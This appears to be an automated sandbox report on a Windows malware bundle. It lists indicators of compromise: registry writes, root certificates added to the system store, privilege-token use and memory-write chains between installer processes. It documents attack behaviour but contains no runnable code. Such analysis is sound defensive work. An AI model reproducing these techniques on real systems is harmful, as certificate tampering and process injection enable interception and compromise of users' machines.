Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	Thu024ca9649258.exe

Modifies system certificate store 2 TTPs 11 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

patch.exeThu020afc6240.exeThu0247db132a8b.execsrss.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	Thu020afc6240.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	Thu020afc6240.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Thu0247db132a8b.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	Thu0247db132a8b.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exetkools.exeThu024ca9649258.exeThu024ca9649258.exe

pid	process
2788	powershell.exe
2780	powershell.exe
1216	tkools.exe
1216	tkools.exe
1204
1204
1204
1204
1204
1204
1204
1204
1204
1204
1204
1204
1204
1204
1204
976	Thu024ca9649258.exe
1204
1204
1204
1204
1204
1204
1204
1204
1204
1204
1204
2836	Thu024ca9649258.exe
2836	Thu024ca9649258.exe
2836	Thu024ca9649258.exe
2836	Thu024ca9649258.exe
2836	Thu024ca9649258.exe
1204
1204
1204
1204
1204
1204
1204
1204
1204
1204
1204
1204
1204
1204
1204
1204
1204
1204
1204
1204
1204
1204
1204
1204
1204
1204
1204
1204

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

1204
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

460
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

tkools.exe

pid process

1216 tkools.exe

pid	process
1204

pid	process
460

pid	process
1216	tkools.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exeThu020afc6240.exetaskkill.exeThu0254f37076fcd55fb.exeThu02f01df988c7.exeThu02acb863a216.exeThu029178728a4f78d0a.exetaskkill.exeThu024ca9649258.exetkools.execsrss.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2788	powershell.exe
Token: SeDebugPrivilege	2780	powershell.exe
Token: SeCreateTokenPrivilege	2076	Thu020afc6240.exe
Token: SeAssignPrimaryTokenPrivilege	2076	Thu020afc6240.exe
Token: SeLockMemoryPrivilege	2076	Thu020afc6240.exe
Token: SeIncreaseQuotaPrivilege	2076	Thu020afc6240.exe
Token: SeMachineAccountPrivilege	2076	Thu020afc6240.exe
Token: SeTcbPrivilege	2076	Thu020afc6240.exe
Token: SeSecurityPrivilege	2076	Thu020afc6240.exe
Token: SeTakeOwnershipPrivilege	2076	Thu020afc6240.exe
Token: SeLoadDriverPrivilege	2076	Thu020afc6240.exe
Token: SeSystemProfilePrivilege	2076	Thu020afc6240.exe
Token: SeSystemtimePrivilege	2076	Thu020afc6240.exe
Token: SeProfSingleProcessPrivilege	2076	Thu020afc6240.exe
Token: SeIncBasePriorityPrivilege	2076	Thu020afc6240.exe
Token: SeCreatePagefilePrivilege	2076	Thu020afc6240.exe
Token: SeCreatePermanentPrivilege	2076	Thu020afc6240.exe
Token: SeBackupPrivilege	2076	Thu020afc6240.exe
Token: SeRestorePrivilege	2076	Thu020afc6240.exe
Token: SeShutdownPrivilege	2076	Thu020afc6240.exe
Token: SeDebugPrivilege	2076	Thu020afc6240.exe
Token: SeAuditPrivilege	2076	Thu020afc6240.exe
Token: SeSystemEnvironmentPrivilege	2076	Thu020afc6240.exe
Token: SeChangeNotifyPrivilege	2076	Thu020afc6240.exe
Token: SeRemoteShutdownPrivilege	2076	Thu020afc6240.exe
Token: SeUndockPrivilege	2076	Thu020afc6240.exe
Token: SeSyncAgentPrivilege	2076	Thu020afc6240.exe
Token: SeEnableDelegationPrivilege	2076	Thu020afc6240.exe
Token: SeManageVolumePrivilege	2076	Thu020afc6240.exe
Token: SeImpersonatePrivilege	2076	Thu020afc6240.exe
Token: SeCreateGlobalPrivilege	2076	Thu020afc6240.exe
Token: 31	2076	Thu020afc6240.exe
Token: 32	2076	Thu020afc6240.exe
Token: 33	2076	Thu020afc6240.exe
Token: 34	2076	Thu020afc6240.exe
Token: 35	2076	Thu020afc6240.exe
Token: SeDebugPrivilege	2916	taskkill.exe
Token: SeDebugPrivilege	1544	Thu0254f37076fcd55fb.exe
Token: SeDebugPrivilege	904	Thu02f01df988c7.exe
Token: SeDebugPrivilege	900	Thu02acb863a216.exe
Token: SeDebugPrivilege	584	Thu029178728a4f78d0a.exe
Token: SeShutdownPrivilege	1204
Token: SeShutdownPrivilege	1204
Token: SeShutdownPrivilege	1204
Token: SeDebugPrivilege	2508	taskkill.exe
Token: SeDebugPrivilege	976	Thu024ca9649258.exe
Token: SeImpersonatePrivilege	976	Thu024ca9649258.exe
Token: SeShutdownPrivilege	1204
Token: SeShutdownPrivilege	1204
Token: SeDebugPrivilege	2756	tkools.exe
Token: SeShutdownPrivilege	1204
Token: SeShutdownPrivilege	1204
Token: SeShutdownPrivilege	1204
Token: SeShutdownPrivilege	1204
Token: SeShutdownPrivilege	1204
Token: SeShutdownPrivilege	1204
Token: SeShutdownPrivilege	1204
Token: SeSystemEnvironmentPrivilege	2120	csrss.exe
Token: SeDebugPrivilege	2420	powershell.exe
Token: SeShutdownPrivilege	1204
Token: SeShutdownPrivilege	1204
Token: SeShutdownPrivilege	1204
Token: SeShutdownPrivilege	1204
Token: SeShutdownPrivilege	1204

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

Thu024bc696ba.tmp

pid process

1616 Thu024bc696ba.tmp

pid	process
1616	Thu024bc696ba.tmp

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.exe

description	pid	process	target process
PID 2400 wrote to memory of 1768	2400	setup_x86_x64_install.exe	setup_installer.exe
PID 2400 wrote to memory of 1768	2400	setup_x86_x64_install.exe	setup_installer.exe
PID 2400 wrote to memory of 1768	2400	setup_x86_x64_install.exe	setup_installer.exe
PID 2400 wrote to memory of 1768	2400	setup_x86_x64_install.exe	setup_installer.exe
PID 2400 wrote to memory of 1768	2400	setup_x86_x64_install.exe	setup_installer.exe
PID 2400 wrote to memory of 1768	2400	setup_x86_x64_install.exe	setup_installer.exe
PID 2400 wrote to memory of 1768	2400	setup_x86_x64_install.exe	setup_installer.exe
PID 1768 wrote to memory of 1984	1768	setup_installer.exe	setup_install.exe
PID 1768 wrote to memory of 1984	1768	setup_installer.exe	setup_install.exe
PID 1768 wrote to memory of 1984	1768	setup_installer.exe	setup_install.exe
PID 1768 wrote to memory of 1984	1768	setup_installer.exe	setup_install.exe
PID 1768 wrote to memory of 1984	1768	setup_installer.exe	setup_install.exe
PID 1768 wrote to memory of 1984	1768	setup_installer.exe	setup_install.exe
PID 1768 wrote to memory of 1984	1768	setup_installer.exe	setup_install.exe
PID 1984 wrote to memory of 2748	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2748	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2748	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2748	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2748	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2748	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2748	1984	setup_install.exe	cmd.exe
